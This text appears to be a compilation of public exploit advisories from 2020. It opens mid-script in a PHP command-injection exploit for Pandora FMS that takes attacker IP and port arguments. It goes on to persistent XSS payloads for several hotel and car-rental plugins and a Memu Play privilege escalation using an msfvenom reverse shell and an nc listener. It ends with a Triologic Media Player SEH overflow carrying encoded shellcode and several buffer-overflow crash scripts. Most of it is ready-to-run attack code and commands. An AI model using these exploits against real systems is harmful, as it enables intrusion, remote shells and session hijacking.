    curl_setopt($ch1, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7");
    curl_setopt($ch1, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch1, CURLOPT_REFERER, $url);
    curl_setopt($ch1, CURLOPT_SSL_VERIFYPEER, 0);
    curl_setopt($ch1, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch1, CURLOPT_CUSTOMREQUEST, "POST");
    curl_setopt($ch1, CURLOPT_POST, 1);
    curl_setopt($ch1, CURLOPT_POSTFIELDS, "operation=2&select_ips=".$payload."&community=public&submit=Execute");
    curl_exec($ch1);
    curl_close($ch1);
    echo $payload."\n";
}
else{
    echo "\n\nphp exploit.php http://127.0.0.1/pandora_console/ username password attacker-ip attacker-port\n\n";
}
?>

#
# Persistent Cross-Site Scripting.
# The value of the similar_ids request parameter is copied into the value of an HTML tag attribute which is an event handler and is encapsulated in double quotation marks. The payload 23859';document.location=1//981xgeu3m was submitted in the similar_ids parameter. This input was echoed as 23859';document.location=1//981xgeu3m in the application's response. 
#
# GET /pandora_console/ajax.php?page=include%2Fajax%2Fevents&get_extended_event=1&group_rep=1&event_rep=1&dialog_page=general&similar_ids=2123859'%3bdocument.location%3d1%2f%2f981xgeu3m&timestamp_first=1585865889&timestamp_last=1585865889&user_comment=&event_id=21&server_id=0&meta=0&childrens_ids=%5B0%2C12%2C8%2C4%2C9%2C2%2C10%2C13%2C11%5D&history=0 
# HTTP/1.1
# Host: pandorafms.host
# User-Agent: Mozilla/5.0 (X11; Linux i686; rv:68.0) Gecko/20100101 Firefox/68.0
# Accept: text/html, */*; q=0.01
# Accept-Language: en-US,en;q=0.5
# Accept-Encoding: gzip, deflate
# Referer: http://pandorafms.host/pandora_console/index.php?sec=eventos&sec2=operation/events/events
# X-Requested-With: XMLHttpRequest
# Connection: close
# Cookie: clippy_is_annoying=1; PHPSESSID=tn2pdl4p1qiq4bta26psj0mcj1

# Exploit Title: Mirus Landing Pages V1 XSS Vulnerability
# Google Dork:N/A
# Date: 2020-04-03
# Exploit Author: @ThelastVvV
# Vendor Homepage: https://mirus.co.il/
# Version: Landing Pages v1
# Tested on: Ubuntu

---------------------------------------------------------

PoC 1 :

XSS Vulnerability

Payload(s) :

In Search box use payload:
"><img src=x onerror=prompt(document.domain);>

# Exploit Title: Memu Play 7.1.3 - Insecure Folder Permissions
# Discovery by: chuyreds
# Discovery Date: 2020-03-08
# Vendor Homepage: https://www.memuplay.com/
# Software Link : https://www.memuplay.com/download-en.php?file_name=Memu-Setup&from=official_release
# Tested Version: 7.1.3
# Vulnerability Type: Local
# Tested on OS: Windows 10 Pro x64 es

# Description:
#  Memu Play 7.1.3 suffers from Privilege Escalation due to insecure file permissions

# Prerequisites
# Local, Low privilege access with restart capabilities

# Details
# By default the Authenticated Users group has the modify permission to ESM folders/files as shown below.  
# A low privilege account is able to rename the MemuService.exe file located in this same path and replace 
# with a malicious file that would connect back to an attacking computer giving system level privileges 
# (nt authority\system) due to the service running as Local System.  
# While a low privilege user is unable to restart the service through the application, a restart of the 
# computer triggers the execution of the malicious file.

C:\>icacls "C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe"
C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe Everyone:(I)(F)
                                                      BUILTIN\Administradores:(I)(F)
                                                      BUILTIN\Usuarios:(I)(F)
                                                      NT AUTHORITY\SYSTEM:(I)(F)
                                                      APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
                                                      APPLICATION PACKAGE AUTHORITY\TODOS LOS PAQUETES DE APLICACIÓN RESTRINGIDOS:(I)(RX)

Se procesaron correctamente 1 archivos; error al procesar 0 archivos


C:\>sc qc MEmuSVC
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: MEmuSVC
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: "C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe"
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : MEmuSVC
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem

# Proof of Concept

1. Generate malicious .exe on attacking machine
    msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.130 LPORT=443 -f exe > /var/www/html/MemuService.exe

2. Setup listener and ensure apache is running on attacking machine
    nc -lvp 443
    service apache2 start

3. Download malicious .exe on victim machine
    Open browser to http://192.168.1.130/MemuService.exe and download

4. Overwrite file and copy malicious .exe.
    Renename C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe > MemuService.bak
    Copy/Move downloaded 'MemuService.exe' file to C:\Program Files (x86)\Microvirt\MEmu\

5. Restart victim machine

6. Reverse Shell on attacking machine opens
    C:\Windows\system32>whoami
    whoami
    nt authority\system

# Exploit Title: Nsauditor 3.2.0.0 - 'Name' Denial of Service (PoC)
# Discovery by: 0xMoHassan
# Date: 2020-04-04
# Vendor Homepage: http://www.nsauditor.com
# Software Link: http://www.nsauditor.com/downloads/nsauditor_setup.exe
# Tested Version: 3.2.0.0
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows XP - SP3

# About App
# Nsauditor Network Security Auditor is a powerful network security tool designed to scan networks and hosts for vulnerabilities, 
# and to provide security alerts.Nsauditor network auditor checks enterprise network for all potential methods that 
# a hacker might use to attack it and create a report of potential problems that were found , Nsauditor network auditing 
# software significantly reduces the total cost of network management in enterprise environments by enabling 
# IT personnel and systems administrators gather a wide range of information from all the computers in the network without 
# installing server-side applications on these computers and create a report of potential problems that were found.


# PoC
# 1.Run the python script, it will create a new file "POC.txt"
# 3.Run Nsauditor and click on "Register -> Enter Registration Code"
# 2.Paste the content of POC.txt into the Field: 'Name'
# 6.click 'ok'
# 5.Magic happen :)



#!/usr/bin/env python
buff = "\x41" *500
buff += "\x41" * 500

try:
    f=open("POC.txt","w")
    print "[+] Creating %s bytes payload.." %len(buff)
    f.write(buff)
    f.close()
    print "[+] POC created!"
except:
    print "POC cannot be created"

# Exploit Title: WordPress Hotel Booking System Pro v1.1  XSS Vunlerability
# Google Dork:N/A
# Date: 2020-04-04
# Exploit Author: @ThelastVvV
# Vendor Homepage: https://codecanyon.net/item/online-hotel-booking-system-pro-wordpress-plugin/9338914
# Version: 1.1
# Tested on: 5.4.0-4parrot1-amd64

---------------------------------------------------------


Summary:

Persistent Cross-site Scripting in Customer registration-form   all-tags 

PoC 1:



1- Go to the hotel booking page then choose new customor 
http://example/wp-hotel-pro/

2- In "any " field of registration form type your payload :
"><img src=x onerror=prompt(document.domain);>

3-then hit CONTINUE


4- Once the admin logs in and go to Customerlookup page ... the admin will be xssed 


http://example/wp-hotel-pro/wp-admin/admin.php?page=Customerlookup




Impact:
XSS can lead to adminstators/users's Session Hijacking, and if used in conjunction with a social engineering attack it can also lead to disclosure of sensitive data, CSRF attacks and other critical  attacks on administrators directly.


Other infos:

Supported Wordpress versions:
  WordPress 4.9.x
  WordPress 4.8.x
  WordPress 4.7.x
  WordPress 4.6.1
  WordPress 4.6
  WordPress 4.5.x
  WordPress 4.5.2
  WordPress 4.5.1 
  WordPress 4.5 
  WordPress 4.4.2 
  WordPress 4.4.1 
  WordPress 4.4 
  WordPress 4.3.1 
  WordPress 4.3, 
  WordPress 4.2, 
  WordPress 4.1, 
  wordPress 4.0

Screentshoots:

https://imgur.com/7QuD67x

# Exploit Title: Online Hotel Booking System Pro v1.3 XSS Vulnerability
# Google Dork:N/A
# Date: 2020-04-04
# Exploit Author: @ThelastVvV
# Vendor Homepage: https://codecanyon.net/item/online-hotel-booking-system-pro/4606514
# Version: 1.3
# Tested on: 5.4.0-4parrot1-amd64

---------------------------------------------------------


Summary:

Persistent Cross-site Scripting in Customer registration-form   all-tags 

PoC 1:



1- Go to the hotel booking page then choose new customor 


http://example/hotel-booking-pro/

2- In "any " field of registration form type your payload :
"><img src=x onerror=prompt(document.domain);>

3-then hit CONTINUE


4- Once the admin logs in and go to Customerlookup page ... the admin will be xssed 

http://example/hotel-booking-pro/cp/admin-home.php





Impact:
XSS can lead to adminstators/users's Session Hijacking, and if used in conjunction with a social engineering attack it can also lead to disclosure of sensitive data, CSRF attacks and other critical  attacks on administrators directly.




Screentshoots:

https://i.imgur.com/RWArdAB.png

# Exploit Title: Product Key Explorer 4.2.2.0 - 'Key' Denial of Service (PoC)
# Discovery by: 0xMoHassan
# Date: 2020-04-04
# Vendor Homepage: http://www.nsauditor.com
# Software Link: http://www.nsauditor.com/downloads/productkeyexplorer_setup.exe
# Tested Version: 4.2.2.0
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows XP - SP3

# About App

# Product Key Explorer is a powerful product key finder solution for Windows, designed to help users find, # recover and backup activation keys for +9000 popular software programs installed on local or network computers.


# PoC
# 1.Run the python script, it will create a new file "POC.txt"
# 3.Run Product Key Explorer and click on "Register -> Enter Registration Code"
# 2.Paste the content of POC.txt into the Field: 'Key'
# 6.click 'ok'
# 5.Magic happen :)



#!/usr/bin/env python
buff = "\x41" *500
buff += "\x41" * 500

try:
    f=open("POC.txt","w")
    print "[+] Creating %s bytes payload.." %len(buff)
    f.write(buff)
    f.close()
    print "[+] POC created!"
except:
    print "POC cannot be created"

# Exploit Title: Triologic Media Player 8 - '.m3l' Local Buffer Overflow (Unicode) (SEH)
# Date: 04/04/2020
# Author: Felipe Winsnes
# Software Link: http://download.cnet.com/Triologic-Media-Player/3000-2139_4-10691520.html
# Version: 8
# Tested on: Windows 7 (x86)

# Proof of Concept:
# 1.- Run the python script, it will create a new file called "poc.m3l".
# 2.- Open the Application.
# 3.- Some windows warning boxes regarding sound issues may pop up, just click OK.
# 4.- Click on the bottom-right button that displays an arrow and has written "LIST".
# 5.- Select the file "poc.m3l".
# 6.- Profit.

import struct

# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/unicode_mixed BufferRegister=EAX EXITFUNC=thread 
# Payload size: 512 bytes

buf =  b""
buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += b"\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += b"\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
buf += b"\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
buf += b"\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
buf += b"\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
buf += b"\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
buf += b"\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
buf += b"\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
buf += b"\x47\x42\x39\x75\x34\x4a\x42\x79\x6c\x7a\x48\x61\x72"
buf += b"\x39\x70\x6b\x50\x49\x70\x73\x30\x54\x49\x47\x75\x70"
buf += b"\x31\x79\x30\x4f\x74\x72\x6b\x70\x50\x70\x30\x32\x6b"
buf += b"\x51\x42\x7a\x6c\x74\x4b\x42\x32\x6e\x34\x64\x4b\x64"
buf += b"\x32\x6b\x78\x6c\x4f\x57\x47\x4d\x7a\x4d\x56\x4e\x51"
buf += b"\x59\x6f\x46\x4c\x4f\x4c\x71\x51\x61\x6c\x49\x72\x4c"
buf += b"\x6c\x6d\x50\x36\x61\x46\x6f\x6c\x4d\x4a\x61\x37\x57"
buf += b"\x69\x52\x7a\x52\x31\x42\x51\x47\x74\x4b\x6e\x72\x4a"
buf += b"\x70\x44\x4b\x30\x4a\x4d\x6c\x34\x4b\x6e\x6c\x5a\x71"
buf += b"\x74\x38\x39\x53\x6d\x78\x49\x71\x5a\x31\x70\x51\x62"
buf += b"\x6b\x70\x59\x6b\x70\x5a\x61\x46\x73\x62\x6b\x4e\x69"
buf += b"\x4a\x78\x48\x63\x4f\x4a\x61\x39\x72\x6b\x4d\x64\x62"
buf += b"\x6b\x4a\x61\x36\x76\x4c\x71\x59\x6f\x44\x6c\x45\x71"
buf += b"\x58\x4f\x6a\x6d\x49\x71\x39\x37\x4d\x68\x39\x50\x73"
buf += b"\x45\x58\x76\x69\x73\x43\x4d\x4c\x38\x4f\x4b\x31\x6d"
buf += b"\x4c\x64\x72\x55\x58\x64\x72\x38\x62\x6b\x30\x58\x4f"
buf += b"\x34\x6a\x61\x7a\x33\x31\x56\x54\x4b\x4c\x4c\x6e\x6b"
buf += b"\x44\x4b\x50\x58\x4d\x4c\x4a\x61\x38\x53\x72\x6b\x5a"
buf += b"\x64\x54\x4b\x5a\x61\x58\x50\x33\x59\x61\x34\x6d\x54"
buf += b"\x6c\x64\x71\x4b\x51\x4b\x6f\x71\x62\x39\x70\x5a\x6f"
buf += b"\x61\x79\x6f\x47\x70\x61\x4f\x61\x4f\x71\x4a\x44\x4b"
buf += b"\x4d\x42\x38\x6b\x34\x4d\x4f\x6d\x42\x4a\x49\x71\x62"
buf += b"\x6d\x42\x65\x45\x62\x69\x70\x39\x70\x59\x70\x50\x50"
buf += b"\x51\x58\x4d\x61\x74\x4b\x42\x4f\x33\x57\x6b\x4f\x46"
buf += b"\x75\x37\x4b\x47\x70\x6b\x6d\x6e\x4a\x5a\x6a\x53\x38"
buf += b"\x46\x46\x52\x75\x65\x6d\x45\x4d\x6b\x4f\x57\x65\x6d"
buf += b"\x6c\x7a\x66\x43\x4c\x6c\x4a\x35\x30\x59\x6b\x67\x70"
buf += b"\x50\x75\x6b\x55\x45\x6b\x4d\x77\x5a\x73\x32\x52\x52"
buf += b"\x4f\x30\x6a\x59\x70\x51\x43\x69\x6f\x38\x55\x52\x43"
buf += b"\x50\x61\x32\x4c\x61\x53\x6c\x6e\x43\x35\x51\x68\x6f"
buf += b"\x75\x4d\x30\x41\x41"

nseh = "\x71\x41"
seh = "\x41\x4a"

alignment = ""
alignment += "\x54\x71"       # push ebx, padding
alignment += "\x58\x71"       # pop eax, padding
alignment += "\x05\x20\x22"   # add eax, 0x22002000
alignment += "\x71"           # Padding
alignment += "\x2D\x19\x22"   # sub eax, 0x22001900
alignment += "\x71"           # Padding
alignment += "\x50\x71"       # push eax, padding
alignment += "\xC3"           # retn

buffer = "A" * 536 + nseh + seh + "\x41\x71\x41\x71" + alignment + "C" * 71 + buf + "C" * 2000
f = open ("poc.m3l", "w")
f.write(buffer)
f.close()

# Exploit Title: WordPress Car Rental System 1.3 XSS Vunlerability
# Google Dork:N/A
# Date: 2020-04-04
# Exploit Author: @ThelastVvV
# Vendor Homepage: https://codecanyon.net/item/car-rental-system-wordpress-plugin/4239755?s_rank=3
# Version: 1.3
# Tested on: 5.4.0-kali4-amd64

---------------------------------------------------------


Summary:

Persistent Cross-site Scripting in Customer registration-form   all-tags 

PoC 1:



1- Go to the car renting page then choose new customor 
http://example/wp-car/

2- In "any " field of registration form type your payload :
"><img src=x onerror=prompt(document.domain);>

3-then hit CONTINUE


4- Once the admin logs in and go to Booking list or customer lookup page ... the admin will be xssed 


http://example/wp-car/wp-admin/admin.php?page=booking-list
or 
http://example/wp-car/wp-admin/admin.php?page=cust-lookup




Impact:
XSS can lead to adminstators/users's Session Hijacking, and if used in conjunction with a social engineering attack it can also lead to disclosure of sensitive data, CSRF attacks and other critical  attacks on administrators directly.


Other infos:

Supported Wordpress versions:
  WordPress 4.9.x
  WordPress 4.8.x
  WordPress 4.7.x
  WordPress 4.6.1
  WordPress 4.6
  WordPress 4.5.x
  WordPress 4.5.2
  WordPress 4.5.1 
  WordPress 4.5 
  WordPress 4.4.2 
  WordPress 4.4.1 
  WordPress 4.4 
  WordPress 4.3.1 
  WordPress 4.3, 
  WordPress 4.2, 
  WordPress 4.1, 
  wordPress 4.0

Screentshoots:

https://imgur.com/5Mt5sR0
https://imgur.com/xyd4dur

# Exploit Title: Frigate 3.36 - Denial of Service (PoC) 
# Date: 2020-04-05
# Exploit Author: inter
# Vendor Homepage: http://www.Frigate3.com/
# Software Link Download: http://www.Frigate3.com/download/Frigate3_Std_v36.exe
# Vulnerable Software: Firgate
# Version: 3.36
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on: Windows 7 Ultimate Service Pack 1 (64 bit - English)  

#Steps to Produce the Crash:

#   1.- Run python code: crash.py
#   2.- Copy content to clipboard
#   3.- Open "Frigate3.exe"
#   4.- Go to "Disk"> Find Computer
#   5.- Paste ClipBoard into the "Computer Name:" field
#   6.- Click on OK
#   7.- Crashed

#Python "crash.py" Code:

buffer = "\x41" * 2000
f = open ("Frigate.txt", "w")
f.write(buffer)
f.close()

# Exploit Title: UltraVNC Launcher 1.2.4.0 - 'Password' Denial of Service (PoC)
# Discovery by: chuyreds
# Discovery Date: 2020-04-05
# Vendor Homepage: https://www.uvnc.com/
# Software Link : https://www.uvnc.com/component/jdownloads/send/0-/394-ultravnc-1240-x86-setup.html?Itemid=0
# Tested Version: 1.2.4.0
# Vulnerability Type: Local
# Tested on OS: Windows 10 Pro x64 es

#Steps to produce the crash:
#1.- Run python code: UltraVNC_1.2.40-Launcher_Password.py
#2.- Open UltraVNC_1.2.40-Launcher_Password.txt and copy content to clipboard
#3.- Open UltraVNC Launcher
#4.- Select "Properties"
#5.- In "Password" Paste Clipboard
#6.- Click on "OK"
#7.- Click on "Propieties"
#8.- Crashed

cod = "\x41" * 300

f = open('UltraVNC_1.2.40-Launcher_Password.txt', 'w')
f.write(cod)
f.close()

# Exploit Title:  Car Rental System 2.6 XSS Vunlerability
# Google Dork:N/A
# Date: 2020-04-04
# Exploit Author: @ThelastVvV
# Vendor Homepage: https://codecanyon.net/item/car-rental-system/2734072?s_rank=5
# Version: 2.6
# Tested on: 5.4.0-kali4-amd64

---------------------------------------------------------


Summary:

Persistent Cross-site Scripting in Customer registration-form   all-tags 

PoC 1:



1- Go to the car renting page then choose new customor 
http://example/car-rental/

2- In "any " field of registration form type your payload :
"><img src=x onerror=prompt(document.domain);>

3-then hit CONTINUE


4- Once the admin logs into the admin home page  ... the admin will be xssed 


http://example/car-rental/cp/admin-home.php





Impact:
XSS can lead to adminstators/users's Session Hijacking, and if used in conjunction with a social engineering attack it can also lead to disclosure of sensitive data, CSRF attacks and other critical  attacks on administrators directly.




Screentshoots:
https://i.imgur.com/ybUZwEL.png

# Exploit Title:  UltraVNC Viewer 1.2.4.0 - 'VNCServer' Denial of Service (PoC)
# Discovery by: chuyreds 
# Discovery Date: 2020-04-05
# Vendor Homepage: https://www.uvnc.com/
# Software Link : https://www.uvnc.com/component/jdownloads/send/0-/394-ultravnc-1240-x86-setup.html?Itemid=0
# Tested Version: 1.2.4.0
# Vulnerability Type: Local
# Tested on OS: Windows 10 Pro x64 es

# Steps to produce the crash:
#1.- Run python code: UltraVNC_1.2.40-Viewer_VNCServer.py
#2.- Open UltraViewer_VNCServer.txt and copy content to clipboard
#3.- Open UltraVNC Viewer 
#4.- In "VNC Server" Paste Clipboard
#5.- Click on "Connect"
#6.- Crashed

cod = "\x41" * 256

f = open('UltraVNC_1.2.40-Viewer_VNCServer.txt', 'w')
f.write(cod)
f.close()

# Exploit Title:  UltraVNC Launcher 1.2.4.0 - 'RepeaterHost' Denial of Service (PoC)
# Discovery by: chuyreds 
# Discovery Date: 2020-04-05
# Vendor Homepage: https://www.uvnc.com/
# Software Link : https://www.uvnc.com/component/jdownloads/send/0-/394-ultravnc-1240-x86-setup.html?Itemid=0
# Tested Version: 1.2.4.0
# Vulnerability Type: Local
# Tested on OS: Windows 10 Pro x64 es

#Steps to produce the crash:
#1.- Run python code: UltraVNC_1.2.40-Launcher_RepeaterHost.py
#2.- Open UltraVNC_1.2.40-Launcher_RepeaterHost.txt and copy content to clipboard
#3.- Open UltraVNC Launcher
#4.- Select "Properties"
#5.- In "Repeater host" Paste Clipboard
#6.- Click on "OK"
#7.- Crashed

cod = "\x41" * 300

f = open('UltraVNC_1.2.40-Launcher_RepeaterHost.txt', 'w')
f.write(cod)
f.close()

# Exploit Title: SpotAuditor 5.3.4 - 'Name' Denial of Service (PoC)
# Exploit Author: 0xMoHassan
# Date: 2020-04-04
# Vendor Homepage: https://www.spotauditor.com/
# Software Link: http://www.nsauditor.com/downloads/spotauditor_setup.exe
# Tested Version: 5.3.4
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows XP - SP3

# About App

# SpotAuditor is an advanced password recovery solution. The software recovers over 40 popular programs passwords, 
# including passwords saved Google Chrome, Internet Explorer, Firefox and Opera browsers, Microsoft Office Outlook 
# smtp and pop passwords, Hotmail password, Facebook password, Gmail password, Yahoo password, Aol password, 20 
# top FTP program passwords, recovers saved passwords hidden behind of asterisks on dialogs and web forms.

# PoC
# 1.Run the python script, it will create a new file "POC.txt"
# 3.Run SpotAuditor  and click on "Register -> Enter Registration Code"
# 2.Paste the content of POC.txt into the Field: 'Name'
# 6.click 'ok'
# 5.Magic happen :)


#!/usr/bin/env python
buff = "\x41" *500
buff += "\x41" * 500

try:
    f=open("POC.txt","w")
    print "[+] Creating %s bytes payload.." %len(buff)
    f.write(buff)
    f.close()
    print "[+] POC created!"
except:
    print "POC cannot be created"

# Exploit Title: ZOC Terminal v7.25.5 - 'Private key file' Denial of Service (PoC)
# Discovery by: chuyreds
# Discovery Date: 2020-04-05
# Vendor Homepage: https://www.emtec.com
# Software Link : http://www.emtec.com/downloads/zoc/zoc7255_x64.exe
# Tested Version: 7.25.5
# Vulnerability Type: Local
# Tested on OS: Windows 10 Pro x64 es

# Steps to produce the crash:
#1.- Run python code: ZOC_7.25.5_PrivateKeyFile.py
#2.- Open ZOC_7.25.5_PrivateKeyFile.txt and copy content to clipboard
#3.- Open ZOC Terminal
#4.- Select File > Create SSH Key Files... 
#5.- Select "Private key file:" field erease and Paste ClipBoard 
#6.- Click on "Create public/private key files..."
#7.- Crashed

buffer = "\x41" * 2000
f = open ("ZOC_7.25.5_PrivateKeyFile.txt", "w")
f.write(buffer)
f.close()